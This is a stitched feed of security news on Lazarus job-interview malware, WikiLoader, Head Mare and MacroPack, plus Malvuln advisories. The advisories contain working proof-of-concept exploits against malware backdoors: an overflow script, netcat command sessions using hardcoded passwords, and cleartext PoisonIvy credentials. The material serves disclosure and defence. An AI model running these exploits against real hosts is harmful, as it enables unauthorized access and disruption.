North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.
The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for

North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.

The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for Windows and Apple macOS to deliver malware.

Contagious Interview, also tracked as DEV#POPPER, is a malicious campaign orchestrated by a North Korean threat actor tracked by CrowdStrike under the moniker Famous Chollima.

The attack chains begin with a fictitious job interview, tricking job seekers into downloading and running a Node.js project that contains the BeaverTail downloader malware, which in turn delivers a cross-platform Python backdoor known as InvisibleFerret, which is equipped with remote control, keylogging, and browser stealing capabilities.

Some iterations of BeaverTail, which also functions as an information stealer, have manifested in the form of JavaScript malware, typically distributed via bogus npm packages as part of a purported technical assessment during the interview process.

But that changed in July 2024 when the Windows MSI installer and Apple macOS disk image (DMG) files masquerading as the legitimate MiroTalk video conferencing software were discovered in the wild, acting as a conduit to deploy an updated version of BeaverTail.

The latest findings from Group-IB, which has attributed the campaign to the infamous Lazarus Group, suggest that the threat actor is continuing to lean on this specific distribution mechanism, the only difference being that the installer ("FCCCall.msi") mimics FreeConference.com instead of MiroTalk.

It's believed that the phony installer is downloaded from a website named freeconference\[.\]io, which uses the same registrar as the fictitious mirotalk\[.\]net website.

"In addition to Linkedin, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others," security researcher Sharmine Low said.

"After making initial contact, they would often attempt to move the conversation onto Telegram, where they would then ask the potential interviewees to download a video conferencing application, or a Node.js project, to perform a technical task as part of the interview process."

In a sign that the campaign is undergoing active refinement, the threat actors have been observed injecting the malicious JavaScript into both cryptocurrency- and gaming-related repositories. The JavaScript code, for its part, is designed to retrieve the BeaverTail Javascript code from the domain ipcheck\[.\]cloud or regioncheck\[.\]net.

It's worth mentioning here that this behavior was also recently highlighted by software supply chain security firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are simultaneously making use of different propagation vectors.

Another notable change is that BeaverTail is now configured to extract data from more cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X, and Exodus Web3, in addition to implementing functionality to establish persistence using AnyDesk.

That's not all. BeaverTail's information-stealing features are now realized through a set of Python scripts, collectively called CivetQ, which is capable of harvesting cookies, web browser data, keystrokes, and clipboard content, and delivering more scripts. A total of 74 browser extensions are targeted by the malware.

"The malware is able to steal data from Microsoft Sticky Notes by targeting the application's SQLite database files located at \`%LocalAppData%\\Packages\\Microsoft.MicrosoftStickyNotes\_8wekyb3d8bbwe\\LocalState\\plum.sqlite,\` where user notes are stored in an unencrypted format," Low said.

"By querying and extracting data from this database, the malware can retrieve and exfiltrate sensitive information from the victim's Sticky Notes application."

The emergence of CivetQ points to a modularized approach, while also underscoring that the tools are under active development and have been constantly evolving in little increments over the past few months.

"Lazarus has updated their tactics, upgraded their tools, and found better ways to conceal their activities," Low said. "They show no signs of easing their efforts, with their campaign targeting job seekers extending into 2024 and to the present day. Their attacks have become increasingly creative, and they are now expanding their reach across more platforms."

The disclosure comes as the U.S. Federal Bureau of Investigation (FBI) warned of North Korean cyber actors' aggressive targeting of the cryptocurrency industry using "well-disguised" social engineering attacks to facilitate cryptocurrency theft.

"North Korean social engineering schemes are complex and elaborate, often compromising victims with sophisticated technical acumen," the FBI said in an advisory released Tuesday, stating the threat actors scout prospective victims by reviewing their social media activity on professional networking or employment-related platforms.

"Teams of North Korean malicious cyber actors identify specific DeFi or cryptocurrency-related businesses to target and attempt to socially engineer dozens of these companies' employees to gain unauthorized access to the company's network."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Targets Job Seekers with Fake FreeConference App

Backdoor.Win32.Symmi.qua malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6e81618678ddfee69342486f6b5ee780.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Symmi.qua  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on two random high TCP ports, when connecting (ncat) one port will return a single character like "♣" ord(a) "9827" the other ports return no response, target the non responsive port. Third-party adversaries who can detect and reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Symmi  
Type: PE32  
MD5: 6e81618678ddfee69342486f6b5ee780  
SHA256: a073f0bf8599352b57540930c36d655ba9e5a5afeb0c2606b07372e62476d3b3  
Vuln ID: MVID-2024-0692  
Dropped files: ksomnbi.dll   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/03/2024

Memory Dump:  
(1834.3f0): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=fffff74a edx=027ff640 esi=00000000 edi=00000002  
eip=76fced3c esp=027ff038 ebp=027ff078 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:007> .ecxr  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00

0:007> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

FAULTING_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

EXCEPTION_RECORD:  027ff23c -- (.exr 0x27ff23c)  
ExceptionAddress: 10001f32 (ksomnbi+0x00001f32)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 02800000  
Attempt to write to address 02800000

PROCESS_NAME:  Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  027ff28c -- (.cxr 0x27ff28c)  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00  
Resetting default scope

WRITE_ADDRESS:  02800000 

FOLLOWUP_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

FAULTING_THREAD:  000003f0

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 10002fc3 to 10001f32

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
027ff6fc 10002fc3 027ff74a 02517ff0 00000001 ksomnbi+0x1f32  
027fff80 41414141 41414141 41414141 41414141 ksomnbi+0x2fc3  
027fff84 41414141 41414141 41414141 41414141 0x41414141  
027fff88 41414141 41414141 41414141 41414141 0x41414141  
027fff8c 41414141 41414141 41414141 41414141 0x41414141  
027fff90 41414141 41414141 41414141 41414141 0x41414141  
027fff94 41414141 41414141 41414141 41414141 0x41414141  
027fff98 41414141 41414141 41414141 41414141 0x41414141  
027fff9c 41414141 41414141 41414141 41414141 0x41414141  
027fffa0 41414141 41414141 41414141 41414141 0x41414141  
027fffa4 41414141 41414141 41414141 41414141 0x41414141  
027fffa8 41414141 41414141 41414141 41414141 0x41414141  
027fffac 41414141 41414141 41414141 41414141 0x41414141  
027fffb0 41414141 41414141 41414141 41414141 0x41414141  
027fffb4 41414141 41414141 41414141 41414141 0x41414141  
027fffb8 41414141 41414141 41414141 41414141 0x41414141  
027fffbc 41414141 41414141 41414141 41414141 0x41414141  
027fffc0 41414141 41414141 41414141 41414141 0x41414141  
027fffc4 41414141 41414141 41414141 41414141 0x41414141  
027fffc8 41414141 41414141 41414141 41414141 0x41414141  
027fffcc 41414141 41414141 41414141 41414141 0x41414141  
027fffd0 41414141 41414141 41414141 41414141 0x41414141  
027fffd4 41414141 41414141 41414141 41414141 0x41414141  
027fffd8 41414141 41414141 41414141 41414141 0x41414141  
027fffdc 41414141 41414141 41414141 41414141 0x41414141  
027fffe0 41414141 41414141 41414141 41414141 0x41414141  
027fffe4 41414141 41414141 41414141 41414141 0x41414141  
027fffe8 41414141 41414141 41414141 41414141 0x41414141  
027fffec 41414141 41414141 41414141 41414141 0x41414141  
027ffff0 41414141 41414141 41414141 00000000 0x41414141  
027ffff4 41414141 41414141 00000000 00000000 0x41414141  
027ffff8 41414141 00000000 00000000 00000000 0x41414141  
027ffffc 00000000 00000000 00000000 00000000 0x41414141

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ksomnbi+1f32

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ksomnbi

IMAGE_NAME:  ksomnbi.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  537a7d0a

STACK_COMMAND:  .cxr 0x27ff28c ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_ksomnbi.dll!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_ksomnbi+1f32

Followup: MachineOwner  
---------

0:007> !exchain  
027ff0f0: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
027ff710: ksomnbi+30df (100030df)  
027fffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

def doit():

    MALWARE_HOST="x.x.x.x"  
    PORT=6917   #random port

    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    PAYLOAD="CONNECT /"+"A"*2878 + " HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2878\r\nHost: "+MALWARE_HOST  
    s.send(PAYLOAD.encode())  
    s.close()

while 1:  
    doit()  
    time.sleep(0.5)

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Symmi.qua MVID-2024-0692 Buffer Overflow

Backdoor.Win32.Optix.02.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Optix.02.bVulnerability: Weak Hardcoded CredentialsDescription: Optix listens on TCP port 5151 and is packed with ASPack (2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and dump using OllyDumpEx. The unpacked PE file reveals a very weak three character cleartext password "1q1" stored as "svrpwd=1q1" at offset: 0000da4c of the unpacked malware. Commands sent to the backdoor use a semicolon ";" as a marker E.g. password;1q1;Family: OptixType: PE32MD5: 706ddc06ebbdde43e4e97de4d5af3b19SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1cVuln ID: MVID-2024-0690Disclosure: 09/03/2024Exploit/PoC:nc64.exe x.x.x.x 5151password;1q1;password;1;Optix Lite v0.2 Server Ready...ExecFile;"c:\Windows\System32\calc.exe"Response;File Ran SuccessfullyGetPath;TheServerPath;c:\windows\sec32.exeGetSysDir;TheSysDir;;C:\WINDOWS\system32\GetWinDir;TheWinDir;;C:\WINDOWS\KillProcPls;pestudio.exe;Response;Program killed successfully!KillProcPls;die.exe;Response;Program killed successfully!GetProcsPls;HeresDaProcs;[System Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;...Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Optix.02.b MVID-2024-0690 Hardcoded Credential

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4dc39c05bcc93e600dd8de16f2f7c599.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4)Vulnerability: Unauthenticated Remote Command ExecutionFamily: JustJokeType: PE32MD5: 4dc39c05bcc93e600dd8de16f2f7c599SHA256: 55662483e663bde98d729489c6b25986003a40df1e2be376b0c3b20d2d6c7987 Vuln ID: MVID-2024-0689Dropped files: Scanvegw.exeDisclosure: 09/03/2024Description: The malware listens on TCP port 28072.  Upon execution, throws an error alert dialog with message: "File DATA1.CAB not found!". The backdoor then drops a hidden PE file named "Scanvegw.exe" in SysWoW64 use attrib -s -h. The malware then makes outbound connections to SMTP port 25. Hit enter twice when sending commands use "E" for Execute and "T" for Terminate. Calling programs incorrectly still gives a response of "Executed!" when it actually fails. The malware calls Win32 WinExec API, supply full path to the file.0046A0CC                 push    eax             ; lpCmdLine0046A0CD                 call    WinExec0046A0D2                 push    offset aTmp     ; "tmp!?!"0046A0D7                 push    [ebp+var_C]0046A0DA                 push    offset aExecuted ; " Executed!"0046A0DF                 lea     eax, [ebp+var_168]0046A0E5                 mov     edx, 30046A0EA                 call    sub_40495CExploit/PoC:nc64.exe x.x.x.x 28072E "c:\\Windows\\System32\\calc.exe";tmp!?!"c:\\Windows\\System32\\calc.exe";Executed!E GetDir;tmp!?!GetDir; Executed!GetDir;C:\WINDOWS\system32@AudioToastIcon.png@EnrollmentToastIcon.png@VpnToastIcon.png@WirelessDisplayToast.pngaadauthhelper.dllaadtb.dllAboveLockAppHost.dllaccessibilitycpl.dllE GetDrive;tmp!?!GetDrive; Executed!GetDrive;c: d:GetFiles;GetSpace;Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) MVID-2024-0689 Code Execution

Backdoor.Win32.PoisonIvy.ymw malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.PoisonIvy.ymwVulnerability: Insecure Credential StorageFamily: PoisonIvyType: PE32MD5: b0748f1c1a17bad44dc9bd750fc97547SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920Vuln ID: MVID-2024-0688Dropped files: PILib.dll, Poison Ivy.ini, .pipDisclosure: 09/03/2024Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext."malvuln.pip" [Advanced]PEbinary=1PEc=0PEd=0PEp=0PE=1FileAlign=512KeyLogger=0InjectServer=0Persistence=0ProcessMutex=)!VoqA.I4CustomInject=0CustomInjectProc=msnmsgr.exe[Connection]Group=HijackProxy=0HijackProxyPersist=0DNS=192.168.18.125:3460:0,ID=malvulnPassword=apparitionsecPasswordKey=0Proxy=0ProxyDNS=[Install]Startup=0StartupHKLM=1StartupActiveX=0ActiveXKey=HKLMName=Copy=0Filename=CopySystem=1CopyWindows=0ADS=0Melt=0[Build]Icon=bThirdParty=0ThirdParty=upx.exe "%s""Poison Ivy.ini"[Disclaimer]Show=1[Settings]RemoveKeyFile=1StorePlugins=1SDrounds=3HidePW=0PlaySound=0SoundPath=%PI%\sound.wavCache=1CachePath=%PI%\Users\%USR%\ImagePath=%PI%\Users\%USR%\Images\AudioPath=%PI%\Users\%USR%\Audio\NotesPath=%PI%\Notes\AutoRefresh=0WindowColor=1TimestampColor=1KeynameColor=1WindowName=008000Timestamp=0000FFKeyname=808080AutoRemove=1AutoLookUpdates=1SimTransfers=2DownloadPath=%PI%\Users\%USR%\Download\ProfilePath=%PI%\Profiles\PluginPath=%PI%\Plugins\TreeLayout=1CloseTray=0MinimizeTray=1BalloonTip=1Prompt=0PromptExit=0PromptDelete=1ColumnInfo=1Groups=0ColumnPath=%PI%\Data\Thumbs=0ThumbSize=96Highlight=0HighlightExt=ScrSize=75ScrBits=24ShareTo=ShareToSocks=ShareSocks=0[Placement]DataTransfers=1MaximizedState=0Top=63Left=416Width=936Height=540ConTop=132ConLeft=260ConWidth=650ConHeight=380[Client0]Port=3460KeyFile=0Password=adminExploit/PoC:DE:0055DD64 aPassword_7     db 'Password: *****',0  ; DATA XREF: sub_55D128+292↑oCODE:0055DD74                 dd 0FFFFFFFFh, 5CODE:0055DD7C aAdmin_2        db 'admin',0            ; DATA XREF: sub_55D128:loc_55D3C6↑o004016C0                 db  61h ; a004016C1                 db  70h ; p004016C2                 db  70h ; p004016C3                 db  61h ; a004016C4                 db  72h ; r004016C5                 db  69h ; i004016C6                 db  74h ; t004016C7                 db  69h ; i004016C8                 db  6Fh ; o004016C9                 db  6Eh ; n004016CA                 db  73h ; s004016CB                 db  65h ; e004016CC                 db  63h ; cDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.PoisonIvy.ymw MVID-2024-0688 Insecure Credential Storage

A new malware campaign is spoofing Palo Alto Networks' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign.

The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers

Malware / Network Security

A new malware campaign is spoofing Palo Alto Networks' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign.

The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers Mark Lim and Tom Marsden said.

WikiLoader, first documented by Proofpoint in August 2023, has been attributed to a threat actor known as TA544, with the email attacks leveraging the malware to deploy Danabot and Ursnif.

Then earlier this April, South Korean cybersecurity company AhnLab detailed an attack campaign that leveraged a trojanized version of a Notepad++ plugin as the distribution vector.

That said, the loader for rent is suspected to be used by at least two initial access brokers (IABs), per Unit 42, stating the attack chains are characterized by tactics that allow it to evade detection by security tools.

"Attackers commonly use SEO poisoning as an initial access vector to trick people into visiting a page that spoofs the legitimate search result to deliver malware rather than the searched-for product," the researchers said.

"This campaign's delivery infrastructure leveraged cloned websites relabeled as GlobalProtect along with cloud-based Git repositories."

Thus, users who end up searching for the GlobalProtect software are displayed Google ads that, upon clicking, redirect users to a fake GlobalProtect download page, effectively triggering the infection sequence.

The MSI installer includes an executable ("GlobalProtect64.exe") that, in reality, is a renamed version of a legitimate share trading application from TD Ameritrade (now part of Charles Schwab) used to sideload a malicious DLL named "i4jinst.dll."

This paves the way for the execution of shellcode that goes through a sequence of steps to ultimately download and launch the WikiLoader backdoor from a remote server.

To further improve the perceived legitimacy of the installer and deceive victims, a fake error message is displayed at the end of the whole process, stating certain libraries are missing from their Windows computers.

Besides using renamed versions of legitimate software for sideloading the malware, the threat actors have incorporated anti-analysis checks that determine if WikiLoader is running in a virtualized environment and terminate itself when processes related to virtual machine software are found.

While the reason for the shift from phishing to SEO poisoning as a spreading mechanism is unclear, Unit 42 theorized that it's possible the campaign is the work of another IAB or that existing groups delivering the malware have done so in response to public disclosure.

"The combination of spoofed, compromised and legitimate infrastructure leveraged by WikiLoader campaigns reinforces the malware authors attention to building an operationally secure and robust loader, with multiple \[command-and-control\] configurations," the researchers said.

The disclosure comes days after Trend Micro uncovered a new campaign that also leverages a fake GlobalProtect VPN software to infect users in the Middle East with backdoor malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Use Fake GlobalProtect VPN Software in New WikiLoader Malware Attack

A hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus.
"Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools.
"For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which

A hacktivist group known as **Head Mare** has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus.

"Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools.

"For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which allows the attacker to execute arbitrary code on the system via a specially prepared archive. This approach allows the group to deliver and disguise the malicious payload more effectively."

Head Mare, active since 2023, is one of the hacktivist groups attacking Russian organizations in the context of the Russo-Ukrainian conflict that began a year before.

It also maintains a presence on X, where it has leaked sensitive information and internal documentation from victims. Targets of the group's attacks include governments, transportation, energy, manufacturing, and environment sectors.

Unlike other hacktivist personas that likely operate with an aim to inflict "maximum damage" to companies in the two countries, Head Mare also encrypts victims' devices using LockBit for Windows and Babuk for Linux (ESXi), and demands a ransom for data decryption.

Also part of its toolkit are PhantomDL and PhantomCore, the former of which is a Go-based backdoor that's capable of delivering additional payloads and uploading files of interest to a command-and-control (C2) server.

PhantomCore (aka PhantomRAT), a predecessor to PhantomDL, is a remote access trojan with similar features, allowing for downloading files from the C2 server, uploading files from a compromised host to the C2 server, as well as executing commands in the cmd.exe command line interpreter.

"The attackers create scheduled tasks and registry values named MicrosoftUpdateCore and MicrosoftUpdateCoree to disguise their activity as tasks related to Microsoft software," Kaspersky said.

"We also found that some LockBit samples used by the group had the following names: OneDrive.exe \[and\] VLC.exe. These samples were located in the C:\\ProgramData directory, disguising themselves as legitimate OneDrive and VLC applications."

Both the artifacts have been found to be distributed via phishing campaigns in the form of business documents with double extensions (e.g., решение №201-5\_10вэ\_001-24 к пив экран-сои-2.pdf.exe or тз на разработку.pdf.exe).

Another crucial component of its attack arsenal is Sliver, an open-source C2 framework, and a collection of various publicly available tools such as rsockstun, ngrok, and Mimikatz that facilitate discovery, lateral movement, and credential harvesting.

The intrusions culminate in the deployment of either LockBit or Babuk depending on the target environment, followed by dropping a ransom note that demands a payment in exchange for a decryptor to unlock the files.

"The tactics, methods, procedures, and tools used by the Head Mare group are generally similar to those of other groups associated with clusters targeting organizations in Russia and Belarus within the context of the Russo-Ukrainian conflict," the Russian cybersecurity vendor said.

"However, the group distinguishes itself by using custom-made malware such as PhantomDL and PhantomCore, as well as exploiting a relatively new vulnerability, CVE-2023-38831, to infiltrate the infrastructure of their victims in phishing campaigns."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hacktivists Exploits WinRAR Vulnerability in Attacks Against Russia and Belarus

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.

*   Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.”
*   MacroPack is a framework designated for Red Team exercises, but we assess, with moderate confidence, that malicious actors are also using it to deploy malicious payloads.
*   Talos analyzed the most recent documents uploaded to VirusTotal from different sources and countries, including China, Pakistan, Russia and the U.S., uncovering connections between the payloads and motivations for creating these documents.
*   These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
*   Talos was not able to attribute these activities to a single actor despite some similarities in tactics, techniques and procedures (TTPs). No Talos customers were affected by these attacks and there are no related activities  in any Cisco product telemetry.

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. 

As a part of regular hunting exercises for malicious documents similar to the ones used by UNC1151, we discovered several suspicious documents using VBA macros that were similar but could not be attributed to the same threat actor.

Although the VBA code was similar — using obfuscated variable and function names and one or more layers of obfuscated code in their following stages — the lure themes were different, ranging from generic topics that instruct users to enable VBA macros, to official-looking documents and letters that appear to come from military organizations, pointing to various distinct threat actors. 

**Common characteristics of MacroPack VBA code**

The VBA code in all the documents had similar characteristics, which we traced to the MacroPack framework. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. 

The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures:

*   Function renaming.
*   Variable renaming.
*   Removal of surplus space characters.
*   Removal of comments.
*   Strings encoding.
*   Payload obfuscation.

A payload string deobfuscation function generated by MacroPack.

MacroPack is designed to be easy to use and quickly generate various payloads allowing users to build working implants with a single command line. 

MacroPack also exists in a professional, supported version, which contains additional functionality to make payloads more resilient and has some more advanced features such as anti-malware bypass, more advanced payloads, anti-reversing and additional payloads. The author states that the tool is intended to be used by Red Team members and not for malicious purposes, although there is no control over who uses the free version of the tool. 

**Inclusion of non-malicious code**

A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines. These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents. 

At the beginning of the investigation, we suspected all the documents containing these unusual non-malicious subroutines were created by a single threat actor. But the different document lures and countries from where the documents were uploaded lead us to conclude that those subroutines were included by the professional version of MacroPack, which we confirmed via reliable, high-fidelity sources. 

Snippet of code taken from a Word programming book.

We traced the origin of the two functions to a website hosting various VBA examples and one to a French Microsoft Word programming book “Rédigez Facilement Des Documents Avec Word” (“Easily Writing Documents with Word”) by Michel Martin.

Non-malicious functions common for all discovered documents from the VBA examples website.

The inclusion of the benign code is likely to lower the level of suspicion of the code generated by MacroPack. Some anti-malware engines may be able to detect code as suspicious if the entropy of the code is high to indicate pseudo-randomly named variables, functions and obfuscated strings and the inclusion of non-malicious functions with low entropy may be used to lower the overall entropy of the generated code. 

Some documents containing the non-malicious code, attributed to MacroPack, also used a different technique for generating code. Instead of completely pseudo-randomly generated variable and function names, they consisted of combinations of randomly chosen real words. 

The MacroPack author indicated that he worked on a feature to generate names using Markov chains to create seemingly meaningful function and variable names. 

MacroPack author announced the random name generator based on valid English words on X (Twitter). 

This functionality was included by the MacroPack author to improve the bypassing of anti-malware heuristic detections. We discovered a few samples using this technique to obfuscate the functionality of the code with meaningful-looking function and variable names.

Function and variable names generated by a Markov chain.

**MacroPack documents uploaded to VirusTotal**

